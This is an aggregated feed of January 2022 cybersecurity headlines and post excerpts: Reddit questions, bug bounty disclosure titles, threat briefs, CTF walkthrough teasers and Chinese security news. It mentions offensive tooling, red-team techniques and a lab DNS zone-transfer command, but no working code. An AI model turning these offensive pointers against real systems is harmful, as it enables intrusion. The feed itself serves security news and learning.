    Hi, an interesting security incident occured at my home and I would greatly appreciate advice on how to proceed. Few days ago, my HBO service was blocked in all my devices connected to my home WiFi (yet worked outside the network), which was quite interesting and after few calls to HBO support I finally got the information that they actively blocked my IP address due to malicious activity occuring from my IP that was reported in public database. After some googling I found out that this must be the https://www.abuseipdb.com/ where my IP address really was reported (38x) for categories: "Port Scan", "Hacking", "Brute force", "SSH". I checked the reports in details and it seems that all attacks were done via SSH and they were trying to log into different websites using different user name…  ( 5 min )
    Where do you draw the line between legal and illegal?
    I've been jr pentester for few months and was wondering right before you get green light to pentest an web application and you have spare time at work and decide to gather some information, what is your approach? I can find some emails of the company and check with what tools the web app was build. But whenever I do subdomain scraping with amass or sublist3r or other frameworks the firewall is always signaling. I have absolutely no intention to do something illegal and get in trouble neither me or the company. Where do you draw the line which act is legal and illegal? I also want to get into bug bounty programs, but I am afraid because of the same reason. When doing do you use any proxies or other stuff? How do you basically stay safe(keep some anonymity) even for whitehat, when doing this job. submitted by /u/tryingtoworkatm [link] [comments]  ( 4 min )
    What's more lucrative: black hat or white hat hacking?
    submitted by /u/anon314159265358p [link] [comments]  ( 1 min )
  • Open

    Using Go to Develop Offensive Tooling
    With better Security Tooling, that can easily detect Powershell and C# Offensive Tooling, Red Teamers have to adapt their offensive capabilities. Go is a staticly linked programming language which can be easily crossed compiled and needs no installation dependencies. This makes it perfect for Red Teamers. This great talk describes how Golang can be used in an offensive way: ​ https://youtu.be/AGLunpPtOgM submitted by /u/_R4bb1t_ [link] [comments]  ( 1 min )
    MoonBounce: the dark side of UEFI firmware
    submitted by /u/dmchell [link] [comments]
  • Open

    Threat Brief: Ongoing Russia and Ukraine Cyber Conflict
    We analyze and suggest mitigations for CVE-2021-32648 and WhisperGate, two threats that have been targeting Ukrainian organizations. The post Threat Brief: Ongoing Russia and Ukraine Cyber Conflict appeared first on Unit42.
  • Open

    Exnoscan
    Exnoscan is a simple bash script that can help you identify gaps. We often monitor what we know, so Exnoscan aims to identify what you… Continue reading on Medium »  ( 2 min )
    Cyber Detective OSINT CTF “Evidence Investigation” Writeup
    The Cyber Society at Cardiff University runs Cyber Detective CTF, a free OSINT CTF. Continue reading on Medium »  ( 7 min )
    Realizando OSINT con Google LENS
    Hoy les traigo a ustedes un nuevo articulo, donde decidí abordar una temática en especial, haciendo aprovechamiento de una de mis mayores… Continue reading on Medium »  ( 4 min )
    GEOINT y SOCMINT en la Investigación
    Hace unos días leí un artículo del Sr. Diaz Caneja, donde el autor destaca muy bien los alcances del social media intelligence y los… Continue reading on Medium »  ( 3 min )
    Los nuevos paradigmas de la Investigación: CRIMINT y Social media analitycs ante la digitalización
    Para comenzar a hablar sobre estos nuevos paradigmas, primero debemos entender dichas terminologías con el fin de ser mas amena nuestra… Continue reading on Medium »  ( 4 min )
    “YOU” una serie que nos muestra la vulnerabilidad de nuestra información en las Redes Sociales
    Netflix largo una nueva serie donde nos deja ver la importancia de nuestros datos, en dicha historia un joven se obsesiona con una mujer y… Continue reading on Medium »  ( 3 min )
    Quiztime — Random OSINT Challenge 4
    On Jan 7, 2022, Quiztime (contributor @fiete_stegers) shared a new OSINT quiz with us. The objective was, weird :). We had to figure out… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 3
    On Jan 5, 2022, Quiztime (contributor @twone2) shared a new OSINT quiz with us. The objective was, weird :). We had to figure out what was… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 2
    On Jan 1, 2022, a regular Quiztime and contributor @bayer_julia shared a new OSINT quiz with us. The objective was, simple. We had to… Continue reading on Medium »  ( 2 min )
    Quiztime — Random OSINT Challange 1
    On December 29, 2021, Quiztime (contributor @ twone2) shared a new OSINT quiz with us. The objective was, for me at least not very simple… Continue reading on Medium »  ( 2 min )
  • Open

    A Detailed Analysis of WhisperGate Targeting Ukrainian Organizations
    submitted by /u/CyberMasterV [link] [comments]
    Pentest Collaboration Framework: tool which will help you to store/modify/share information about pentest/web analysis projects. OpenSource, Portable, CrossPlatform & completely free! Supports integration with 15 tools & user-defined report generation. For several teams: seperated workspaces!
    submitted by /u/Any_Gas_6250 [link] [comments]  ( 1 min )
    HOUDINI: A web app with huge number of Docker Images for Network Security with run commands and cheatsheet (Hundreds of Offensive and Useful Docker Images for Network Intrusion )
    submitted by /u/deleee [link] [comments]  ( 1 min )
    How mail server related DNS settings (SPF, DKIM, DMARC, MTA-STS, DANE, BIMI) work and their usage stats in the top 1M domain
    submitted by /u/c0r0n3r [link] [comments]  ( 1 min )
    First Morello prototype architecture silicon (memory safety at a hardware level)
    submitted by /u/unaligned_access [link] [comments]  ( 3 min )
    SMBSR made it through another lockdown with some new interesting skills (and fixes). Go check out and judge it (respectfully)
    submitted by /u/oldboy21 [link] [comments]  ( 1 min )
    OctopusWAF is an open-source web application firewall made in C language and uses libevent resources.
    submitted by /u/CoolerVoid [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-20 Review
    浅析现代企业网络安全架构 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-20 Review
    浅析现代企业网络安全架构 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    WMI for Script Kiddies
    Introduction Let’s say an ‘Administrator’ lands on a target network host and wants to look around and ‘administer’ the system without uploading any new tools… How can I do that without burning any of my Script Kiddie tools? WMI or Windows Management Instrumentation or Windows Managed Infrastructure is an interface for managed components that provides... The post WMI for Script Kiddies appeared first on TrustedSec.  ( 12 min )
  • Open

    Hackable: 3 VulnHub Walkthrough
    Hackable: 3, Vulnhub medium machine was created by Elias Sousa and can be downloaded here.This lab is designed for experienced CTF players who want to The post Hackable: 3 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Hackable: 3 VulnHub Walkthrough
    Hackable: 3, Vulnhub medium machine was created by Elias Sousa and can be downloaded here.This lab is designed for experienced CTF players who want to The post Hackable: 3 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Rust – Security advisory for the standard library (CVE-2022-21658)
    Article URL: https://blog.rust-lang.org/2022/01/20/cve-2022-21658.html Comments URL: https://news.ycombinator.com/item?id=30007470 Points: 10 # Comments: 0  ( 2 min )
  • Open

    攻击者用成人游戏做诱饵,通过网盘传播恶意软件
    近日,安全研究人员发现 DDoS IRC Bot 恶意样本正伪装成成人游戏通过网盘进行传播。  ( 1 min )
    攻击者开始使用 XLL 文件进行攻击
    近期,研究人员发现使用恶意 Microsoft Excel 加载项(XLL)文件发起攻击的行动有所增加。  ( 1 min )
    2027年网络安全沙盒市场规模将达到430亿美元
    中国网络安全沙盒市场规模到2027 年预计达到 69 亿美元的市场规模。  ( 1 min )
    《信息安全技术 网络安全从业人员能力基本要求》(征求意见稿)发布
    《基本要求》规定了网络安全从业人员分类和各类从业人员具备的知识和技能要求,适用于各类组织对网络安全从业人员的选拔、培养、评价、管理等。
    营销巨头RRD承认在Conti勒索软件攻击中数据被盗
    美国营销巨头RR Donnelly(RRD)公司日前透露,该公司在一次12月的网络攻击中被窃取了数据。事后经BleepingComputer证实,这是一次Conti勒索软件攻击。RRD是一家头部的综合服务公司,为企业客户提供通信、商业印刷和营销服务。公司在全球200多个地点拥有超33,000名员工,其2021年的收入为49.3亿美元。2011年12月27日,RRD公司向美国证券交易委员会(SEC)
    九部门联合发布《关于推动平台经济规范健康持续发展的若干意见》
    《意见》从健全完善规则制度、提升监管能力和水平、优化发展环境、增强创新发展能力、赋能经济转型发展、保障措施等方面提出了十九条措施。
    红十字国际委员会遭受网络攻击,超 51.5 万人的数据发生泄露
    红十字国际委员会披露其数据承包商遭受网络攻击,导致“家庭团聚”项目信息泄露,超过 51.5 万民众个人数据被盗。  ( 1 min )
    FreeBuf早报 | 美国特工利用WhatsApp监视中国手机;中国首个网安行业服务短号开通
    根据俄亥俄州刚刚申请解封的政府监控显示,2021 年 11 月,美国缉毒署的调查人员要求WhatsApp跟踪 7 名位于中国的用户。。  ( 1 min )
    CACTER邮件安全&中睿天下发布2021年Q4企业邮箱安全报告:重点关注,钓鱼邮件翻倍,85%来自境外!
    CACTER邮件安全联合中睿天下发布邮件安全报告! ️钓鱼邮件同比翻倍增长!来源85%居然来自境外? 年关将至,提高防范,刻不容缓  ( 1 min )
    基于商密SM9算法的物联网安全平台设计与应用
    如何解决物联网的安全,成为摆在政府监管和各类企业面前的一道难题。因此,推行完整、科学、规范化的物联网安全平台已成当务之急。  ( 1 min )
    90分的机房长什么样?(一)
    接上篇《90分的机房长什么样?(一)》内容,本篇继续为大家讲解机房设备中的另外三方面测评标准。  ( 1 min )
    任子行视频网解决方案,专注视频监控数据安全防护!
    有网友爆料称,在B站上还能看到疑似专门破解学校、医院等公共场所监控视频并上传的账号,并可以通过相关的账号看到有用户上传的多段教师讲课、医院护士台以及酒店前台的监控视频。
    剖析NX开启状态下ROP的构造
    在学习pwn的过程中,我们通常会碰到开启NX的情况,也就是堆栈不可执行,在这种情况下,我们要利用栈内的未被清空的内容或者例如init这种函数,来进行构造rop,进一步编写exp拿到shell。  ( 1 min )
    营销巨头数据被盗、国际红十字会遭遇网络攻击|1月20日全球网络安全热点
    FBI警告:骗子正在使用假二维码窃取您的密码和金钱。  ( 1 min )
    网络钓鱼者正冒充美国劳工部骗取用户Office 365账号
    该钓鱼活动已经持续了至少几个月,邮件发件人假装是DoL的高级员工,邀请收件人为正在进行的政府项目提交投标。
    FreeBuf网安大事记 | 2021年度国内网安事件汇总
    国内网络环境一直处于“水深火热”中,网络世界对抗的趋势越来越明显,受到别国的网络攻击频率不断增加。  ( 1 min )
  • Open

    Honeypot Discussions Part-3
    In this article, we will end the honeypot trilogy. If you haven’t read yet Part-1 and Part-2, you may take a look at them first. Or we can… Continue reading on Medium »  ( 7 min )
  • Open

    How Stack Overflow users responded to Log4Shell, the Log4j vulnerability
    Article URL: https://stackoverflow.blog/2022/01/19/heres-how-stack-overflow-users-responded-to-log4shell-the-log4j-vulnerability-affecting-almost-everyone/ Comments URL: https://news.ycombinator.com/item?id=30003308 Points: 2 # Comments: 0  ( 6 min )
  • Open

    wildlife photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]

  • Open

    Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike
    submitted by /u/dmchell [link] [comments]
    Kraken the Code on Prometheus
    submitted by /u/dmchell [link] [comments]
    PerSwaysion Threat Actor Updates Their Techniques and Infrastructure
    submitted by /u/dmchell [link] [comments]
    The OAuth Misconfiguration
    submitted by /u/banginpadr [link] [comments]
  • Open

    Xelu's FREE Controller Prompts | Visual prompts for every mainstream controller's inputs
    submitted by /u/PCubiles [link] [comments]  ( 1 min )
    A large folder of Charles Manson audio recordings
    http://109.120.203.163/Music/BLUES%20and%20country/Charles%20Manson/ Go upwards for more. If anyone finds any steel lap guitar resources, send them my way. I've decided to focus on music and living a simple life, something my life the last few years hasn't been. I changed countries, moved to the country and took a job in nursing. (until I convince my friend Andy to let me session/ tour with his band.) submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    D&D stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by npesaresi: https://hackerone.com/reports/1391724 - Bounty: $250
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by npesaresi: https://hackerone.com/reports/1391725 - Bounty: $450
    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by luuliiromee: https://hackerone.com/reports/1391726 - Bounty: $250
    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by ciohianz: https://hackerone.com/reports/1391727 - Bounty: $250
    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by avada: https://hackerone.com/reports/1391728 - Bounty: $250
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by luuliiromee: https://hackerone.com/reports/1391729 - Bounty: $450
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by ciohianz: https://hackerone.com/reports/1391771 - Bounty: $450
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by avada: https://hackerone.com/reports/1391772 - Bounty: $450
    [GO]: [CWE-090: LDAP Injection All For One]
    GitHub Security Lab disclosed a bug submitted by pupiles: https://hackerone.com/reports/1397942 - Bounty: $1800
    [Python]: CWE-079: HTTP Header injection
    GitHub Security Lab disclosed a bug submitted by jorgectf: https://hackerone.com/reports/1401159 - Bounty: $1800
    [Python]: JWT security-related queries
    GitHub Security Lab disclosed a bug submitted by jorgectf: https://hackerone.com/reports/1403263 - Bounty: $1800
    ihsinme: CPP Add query for CWE-675 Duplicate Operations on Resource
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1413540 - Bounty: $1000
    [porcupiney.hairs]: [Python] Add Flask Path injection sinks
    GitHub Security Lab disclosed a bug submitted by porcupineyhairs: https://hackerone.com/reports/1413541 - Bounty: $1800
    [Java] CWE-400: Query to detect uncontrolled thread resource consumption
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1413542 - Bounty: $1800
    Java: Regex injection
    GitHub Security Lab disclosed a bug submitted by edvraa: https://hackerone.com/reports/1443028 - Bounty: $1000
    [Javascript]: [Clipboard-based XSS]
    GitHub Security Lab disclosed a bug submitted by someonenobbd: https://hackerone.com/reports/1448236
    [Java] CWE-089: MyBatis Mapper XML SQL Injection
    GitHub Security Lab disclosed a bug submitted by jessforfun: https://hackerone.com/reports/1442954 - Bounty: $4500
    [Java] CWE-552: Query to detect unsafe request dispatcher usage
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1454582 - Bounty: $1800
    running a vulnerable log4j
    U.S. Dept Of Defense disclosed a bug submitted by alex_gaynor: https://hackerone.com/reports/1438393
    running a vulnerable log4j
    U.S. Dept Of Defense disclosed a bug submitted by alex_gaynor: https://hackerone.com/reports/1423496
    Reflected XSS on https:///via hidden parameter ""
    U.S. Dept Of Defense disclosed a bug submitted by supr4s: https://hackerone.com/reports/1029243
    Reflected XSS in https:// via hidden parameter ""
    U.S. Dept Of Defense disclosed a bug submitted by supr4s: https://hackerone.com/reports/1029238
    XSS Reflected -
    U.S. Dept Of Defense disclosed a bug submitted by drauschkolb: https://hackerone.com/reports/1223577
    Wrong settings in ADF Faces leads to information disclosure
    U.S. Dept Of Defense disclosed a bug submitted by h3xr: https://hackerone.com/reports/1422641
    User can pay using archived price by manipulating the request sent to `POST /v1/payment_pages/for_plink`
    Stripe disclosed a bug submitted by gregxsunday: https://hackerone.com/reports/1328278 - Bounty: $1000
    Dom Xss vulnerability
    Recorded Future disclosed a bug submitted by fornex: https://hackerone.com/reports/1448616
    Exposed Golang debugger on tier3.riot.mail.ru:9090, 9080
    Mail.ru disclosed a bug submitted by ian: https://hackerone.com/reports/1247910
  • Open

    Are you Looking for a team? Looking to collaborate with other hackers?
    We are looking for more members to join our team to collaborate on Projects, HackTheBox, CTF's & Bug Bounties. Our Members have found Vulnerabilities in the US Dept of Defense, Verizon Media, Yahoo & More on the HackerOne platform. We also have members that have been in the HTB Top 10 & 1st in the UK. You don't have to be the best, we are willing to help and teach members who may not be on our skill level, so please sign up if you're interested. We are trying to create a non-toxic environment in which hackers can collaborate without any drama. Please fill out our form and we will be in contact! Link to form: https://forms.gle/CDzVBLynAL9ftwK38 submitted by /u/Far-Piece-7371 [link] [comments]  ( 1 min )
  • Open

    PCAP Analysis
    Hi there. I am just starting to learn about PCAP analysis/forensics. I am experienced in Windows OS forensics and never really worked with PCAPs before. What's some of the tools everyone uses besides Wireshark? I've been reading up on Zeek. submitted by /u/antmar9041 [link] [comments]  ( 1 min )
    Tails Memory Forensics
    I was curious if anyone knows of any articles that cover this topic. A quick google search hasn’t bore anything useful. Preferably a professional paper submitted by /u/strollingginger [link] [comments]  ( 1 min )
    Degree decision
    Is CS or CE better for cyber forensics? submitted by /u/swatteam23 [link] [comments]  ( 2 min )
  • Open

    From MVP to ISO27001/SOC 2
    Hi Everyone, I just joined this community and would like to reach out with a question. I am a co-founder of an early-stage tech startup (saas) where we're about to reach our second product milestone soon - MVP. Our first commercial release ("Minimum Marketable Product") should happen around September 2022. We are about ten people, half of them developers. Everything is in the cloud. We have a Chief Architect who is a very mature professional. I don't have an IT background, but as we'd like to work with enterprises and other security-minded organizations, I am considering obtaining certification for standards like ISO27001 and/or SOC 2 (Type I and II). Is it a reasonable ambition to start this process as soon as our MVP is out (next month), or it's more realistic to wait until our product and team gains more maturity? If we have to pick, e.g. due to budget constraints, would you recommend to pursue ISO27001 or SOC 2? tl;dr: For a very young startup, what is the best time to start working on compliance and certifications? Thank you! submitted by /u/brunotoronto [link] [comments]  ( 3 min )
    Trend micro Apex One vs Deep Security/Cloud one
    Hi all, Is ApexOne good for Servers and Endpoints both? Or do we need to suggest Deep Security? If it is not good for Servers, why so? I know they are both the products of trend micro, but am not able to find understandable differences between both, need to know the difference between them for a project. Any kind of information or help on this would be nice, thank you. submitted by /u/aaronthecoolgnome [link] [comments]  ( 1 min )
    Hacking books(python) for intermediate programmers
    Some good python books for people who don't know anything about hacking but are intermediate programmers. I've read the book :- Starting out with Python, 5th Edition, ISBN : 9780135929032 submitted by /u/SufficientResident59 [link] [comments]
    Why do hackers like using reverse proxies?
    submitted by /u/baghdadcafe [link] [comments]  ( 1 min )
    Why do people put dots at the end of everything they send in work messages?
    Okay, I know this may not be the right Reddit sub for this question but I figured in IT most of us deal with teams or some sort of messaging. I know this also is kind of a weird thing to make a post about but it just is something I don't understand and genuinely want to. Whenever I message people at work or they message me they always leave dots at the end of a lot of the things they are saying. I have gotten dozens of messages saying "Hello...". It is not a typo either there is no way it could be. It reminds me of when someone texts you something and add it for dramatic effect but it will literally be messages like the one above saying hello or just "Sure...". It's just kind of odd to me but just was wondering if anyone knew why. Edit: Grammar & Thanks for the Informative Responses! submitted by /u/winningrove [link] [comments]  ( 4 min )
    Resources for Compensation
    Hi Everyone, I need some help finding compensation resources. Our security team has been having conflict over compensation with our HR compensation team. We want them to change the compensation band for a Mid-Level Security Analyst because the starting salary is $90k (105 Overall COL area). They tell us they want to start roles at 85% of the grade for the band which is around $70k-$80k. The role requires 5 years of IT exp with 2+ of Security. They claim they have done research but wont share their evidence stating the role is graded properly. It doesnt seems to align with what I have been seeing for other jobs, what people are asking for, or what I found on NIST NICE. what resources are out there to help identifying compensation for roles in cyber by industry (i.e. e-commerce, higher ed, govt, etc). I want to bring something to them that says we are way below market and cannot be competitive but they seem to know otherwise. EDIT: Im the hiring manager for the role submitted by /u/gnomeparadox [link] [comments]  ( 3 min )
    How anonymous is a Azure/AWS VM?
    I would like to mess with some scammers but would like to stay fairly anonymous. Am I correctly understanding that my identify is fairly safe when using a VM on Azure or AWS? I am aware MS/Amazon could still pass my identify to the government but I'm not worried about. My main concern is to stay hidden from the scammers. Thanks in advance for your reply. submitted by /u/LouTr0n [link] [comments]  ( 1 min )
    Python and C++ Hacking Projects
    What are good cybersecurity projects for someone who is a beginner-intermediate in hacking? submitted by /u/Odd_Rip6706 [link] [comments]  ( 1 min )
    How does my university perform MITM monitoring on secure HTTPS connections?
    Hi AskNetsec, After suspicions towards my university's network provider (Eduroam), I have been digging into the extent of which they do, and/or are able to, monitor the activity of the students, while being on the network. Besides the rather normal DNS restrictions, of monitoring and blocking potentially harmful DNS requests, or in this case redirecting to a custom warning page, I have discovered something I would consider unusual. When accessing certain websites with a secure connection, HTTPS, the certificate for the website is tampered with. Meaning, that the certificate for a given website when requested through the university network, is not identical to the certificate returned when requesting from any other network. When digging deeper into the certificates, I found that custom …  ( 7 min )
  • Open

    Comment trouver des prospects gratuitement ?
    Vous souhaitez construire rapidement et gratuitement une liste de prospection ? Continue reading on Medium »  ( 4 min )
    Fun with Google Maps
    I recently posted a Tweet stating that one is able to search Google Maps by name, username, email, phone number, area code…in fact… Continue reading on Medium »  ( 1 min )
    Sosyal Medya OSINT
    Sosyal medya uygulamaları üzerinde kullanıcı adı ile hesap arama. Continue reading on Medium »  ( 3 min )
    SpiderFoot (Automate OSINT for Threat Intelligences)
    About SpiderFoot Continue reading on Medium »  ( 1 min )
  • Open

    Баг Баунти — заработай до 100,000 PTP
    (на момент написания статьи 100k PTP > $1м) Continue reading on Medium »  ( 1 min )
    Hacking with Subdomain3
    Subdomain3 is great tool that can be used to discover subdomains that belong to a website. The tool is written in Python3. Continue reading on Medium »  ( 1 min )
    Live Bug Bounty Training With My Strategy and Let’s hit easily Bounties Together in this year
    Hello Cybersecurity Researchers, Again I’m here after a lot of texts received on my LinkedIn and Instagram that when I launch my Live Bug… Continue reading on Medium »  ( 1 min )
    How I messed up my own profile data
    Just wanted to share one of my experience which I had while testing one of the web application. I will be brief so that I do not waste… Continue reading on Medium »  ( 2 min )
    Top 25 Server-Side Request Forgery (SSRF) Bug Bounty Reports
    In this article, we will discuss the Server-Side Request Forgery (SSRF) vulnerability, and present 25 disclosed reports based on this flaw. Continue reading on Medium »
    Extreme Hacking Mindset
    How to dominate in bug bounties Continue reading on Medium »
    How I found High-Priority PII leak through web archive
    Hello Hackers, Aditya here I am a cyber security student and bug bounty hunter. Continue reading on Medium »  ( 1 min )
  • Open

    CryptoLyzer: A comprehensive cryptographic settings analyzer (introduction with a comparison of cryptographic settings analyzers)
    submitted by /u/c0r0n3r [link] [comments]
    Privilege escalation in Acer Care Center by @last0x00 and @APTortellini
    submitted by /u/last0x00 [link] [comments]
    Introducing TREVORproxy and TREVORspray 2.0
    submitted by /u/aconite33 [link] [comments]
    Gorillas: Special offer - unicorn slices, 150g 🦍❤️
    submitted by /u/moviuro [link] [comments]
    Demonstrating how phishermen abuse free hosting
    submitted by /u/df_works [link] [comments]  ( 1 min )
    SeeYouCM-Thief: Exploiting common misconfigurations in Cisco phone systems
    submitted by /u/HackingLZ [link] [comments]
  • Open

    Operation Falcon II: Unit 42 Helps INTERPOL Identify Nigerian Business Email Compromise Ring Members
    Operation Falcon II, championed by INTERPOL and The Nigeria Police Force, led to the arrest of a number of Nigerian business email compromise actors. The post Operation Falcon II: Unit 42 Helps INTERPOL Identify Nigerian Business Email Compromise Ring Members appeared first on Unit42.
  • Open

    SecWiki News 2022-01-19 Review
    基于上下文感知计算的APT攻击组织追踪方法 by ourren 2021年全球DDoS威胁报告 by ourren 谁动了我的DevOps:DevOps风险测绘 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-19 Review
    基于上下文感知计算的APT攻击组织追踪方法 by ourren 2021年全球DDoS威胁报告 by ourren 谁动了我的DevOps:DevOps风险测绘 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    How Do You Know What "Bad" Looks Like?
    From the time I started in DFIR, one question was always on the forefront of incident responder's minds...how do you know what "bad" looks like? When I was heading on-site during those early engagements, that question was foremost on my mind, and very often, the reason I couldn't sleep on the plane, even on the long, cross country flights. As I gained experience, I started to have a sense of what "bad" might or could look like, and that question started coming from the folks around me (IT staff, etc.) while I was on-site. How do you know what "bad" looks like? The most obvious answer to the question is, clearly, "anything that's not "good"...". However, that doesn't really answer the question, does it? Back in the late '90s, I did a vulnerability assessment for an organization, and at one …  ( 6 min )
  • Open

    Writer HackTheBox Walkthrough
    Introduction Writer is a CTF Linux box with difficulty rated as “medium” on the HackTheBox platform. The machine covers SQL injection vulnerability and privilege escalation The post Writer HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Writer HackTheBox Walkthrough
    Introduction Writer is a CTF Linux box with difficulty rated as “medium” on the HackTheBox platform. The machine covers SQL injection vulnerability and privilege escalation The post Writer HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    【安全通报】Weblogic 一月份更新多个高危漏洞
    近日,Oracle官方 发布了 2022 年 1 月份的安全更新。涉及旗下产品(Weblogic Server、Database Server、Java SE、MySQL等)的 497 个漏洞。此次修复的漏洞中包...  ( 1 min )
  • Open

    【安全通报】Weblogic 一月份更新多个高危漏洞
    近日,Oracle官方 发布了 2022 年 1 月份的安全更新。涉及旗下产品(Weblogic Server、Database Server、Java SE、MySQL等)的 497 个漏洞。此次修复的漏洞中包...  ( 1 min )
  • Open

    Discovering a security vulnerability in a major grocery delivery platform
    Article URL: https://zerforschung.org/posts/gorillas-en/ Comments URL: https://news.ycombinator.com/item?id=29991743 Points: 235 # Comments: 70  ( 8 min )
  • Open

    2021年Linux恶意软件感染数量增长35%
    据统计,2021年内针对Linux设备的恶意软件感染数量上升了35%。  ( 1 min )
    FreeBuf早报 | 美国审查阿里巴巴云业务;美国民主党提出法案禁止网络监视广告
    时尚巨头 Moncler 证实,在 12 月被 AlphV/BlackCat 勒索软件行动窃取文件后遭遇数据泄露,并在暗网上公布。  ( 1 min )
    时尚巨头确认遭遇勒索攻击、1100万部手机已感染木马|1月19日全球网络安全热点
    <p><img src="https://image.3001.net/images/20220119/1642575002_61e7b49a7951f6c85d281.jpg!small" alt=  ( 1 min )
    网络犯罪案例分析:爬虫抢票(四十)
    开发爬虫进行抢票,非法获利12万元,触犯提供侵入、非法控制计算机信息系统程序、工具罪,判处有期徒刑三年。  ( 1 min )
    APT组织档案馆|2021年度APT组织活动态势分析
    本文为《APT组织情报研究年鉴》精华解读系列文章之一,本篇主要介绍年鉴中提到的绿盟科技2021年基于爬虫框架和知识图谱自然语言处理技术。  ( 1 min )
    美国商务部发布软件物料清单 (SBOM) 的最小元素
    定义SBOM的最小元素是一个迭代过程。本报告是起点而非定论。  ( 1 min )
    SAP 严重漏洞可导致供应链攻击
    CVE-2021-38178的CVSS 评分为9.1,其补丁在2021年10月 SAP 补丁日发布。该漏洞被描述为授权不当问题,可导致攻击者篡改传送请求,从而绕过质量门并将代码工件转移到生产系统。  ( 1 min )

  • Open

    Is month of birth considered PII when combined with name (in California if that’s relevant?)
    I would like to add month of birth (without day/date/year) as criteria in a new active directory build, but cannot find a clear cut answer as to whether this is considered PII or not. Thank you in advance. submitted by /u/erpa2b [link] [comments]  ( 1 min )
    Is This Memory Diagram From Practical Malware Analysis Correct?
    I am reading through Practical Malware Analysis and I came across an image of a program's memory layout (Page 69). I have always understood that the stack started at a high memory address and grew towards a lower address, but the diagram in the book shows otherwise. Is there some aspect of this figure I am misinterpreting, or is there a reason why this specific image is different than the stack I am accustom to? Image in the Book: https://i.imgur.com/vLtI3eC.png My Current Interpretation of Memory: https://i.imgur.com/Rt7H4Oj.png Thanks for the help! *Reposted from r/netsecstudents submitted by /u/pufftux [link] [comments]  ( 2 min )
    Taking notes while learning a course
    Hi everyone, I am currently working as a cyber security analyst with about 1.8 years of endpoint security experience and overall 6 years of cyber security experience. Would like your opinion on whether taking notes while you learning a course like say wire shark or Linux is necessary? If no, why? If yes, what is the best way to take notes on something like one notes as I feel its difficult to take notes while watching a video. submitted by /u/aaronthecoolgnome [link] [comments]  ( 3 min )
    Client Certificate Authentication check
    In my company we need to implement Client Certificate Authentication in our web service. Certificates should be self signed and generated by the client. Then they send us the certificate without public key. My idea is that we store these certificates in the database. Now, I am not sure which field should I use to check authenticity of the certificate - thumbprint, subject, something else or multiple fields? I could also completely check public key in database against public key from incoming certificate. What are the recommendations for this scenario? submitted by /u/mandaric [link] [comments]  ( 2 min )
    Understanding host.cnf, DNS, and how to tie it all together?
    I'm currently doing CronOS on HTB. I realize that 1.) 8.8.8.8 will not translate the internal ip address of 10.10.10.7 Then what will? and how do I find the correct DNS server that will? 2.) I need to add 10.10.10.7 cronos.htb into /etc/host.cnf I know by reading that you were supposed to enumerate the hostname because not all hostnames are [nameOfBox].htb... but how was I supposed to know that cronos.htb was the hostname? How do I find out? 3.) Why did "dig axfr xxxx.htb @10.10.10.xx " work? Also, what knowledge am I missing here? I read up on DNS zone transfer attacks and general stuff about DNS, but I'm just not connecting it maybe? I think this topic is very important in the future in regards to large corporate internal networks. I could use some guidance! Reso…  ( 2 min )
    Understanding host.cnf, DNS, and how to tie it all together?
    I'm currently doing CronOS on HTB. I realize that 1.) 8.8.8.8 will not translate the internal ip address of 10.10.10.7 Then what will? and how do I find the correct DNS server that will? 2.) I need to add 10.10.10.7 cronos.htb into /etc/host.cnf I know by reading that you were supposed to enumerate the hostname because not all hostnames are [nameOfBox].htb... but how was I supposed to know that cronos.htb was the hostname? How do I find out? Also, what knowledge am I missing here? I read up on DNS zone transfer attacks and general stuff about DNS, but I'm just not connecting it maybe? I think this topic is very important in the future in regards to large corporate internal networks. I could use some guidance! Resources I've read so far (for those that stumble on this th…  ( 2 min )
    NIST compliant web application scanners
    What are some NIST compliant web app vulnerability scanners that you have come across? 50+ targets. submitted by /u/Dalgan [link] [comments]
    where can I view a full list of MDE detection and alerting rules?
    I've looked everywhere but it seems like this should be available. submitted by /u/slnt1996 [link] [comments]  ( 1 min )
    Can a server send an echo reply with different data?
    I know that's an unusual question, but I know I can send data to my server using ICMP packets (Hiding in the last 48 bytes of the packet, it could be more, but that could be suspicious), but can I receive data from the server? Looking at wireshark I realized the payload was the same in the reply submitted by /u/_JesusChrist_hentai [link] [comments]  ( 1 min )
    Trying to set up a isolated node on a lan network
    I have a secondary router off of my main network that I am trying to make as invisible to the rest of the network as I can. Off of that router I am trying to configure a raspberry pi 4b so it is as secure as I can make it. Potential threat vectors include individuals and small groups. submitted by /u/alonelyvoicespeaks [link] [comments]  ( 1 min )
  • Open

    BlueTeamLabs.Online
    Has anyone tried BlueTeamLabs.Online? I read there was a forensics pathway. Does anyone know if the forensics pathway is any good? Thanks! submitted by /u/DeadBirdRugby [link] [comments]  ( 1 min )
    Check Authenticity of Zip Creation Date
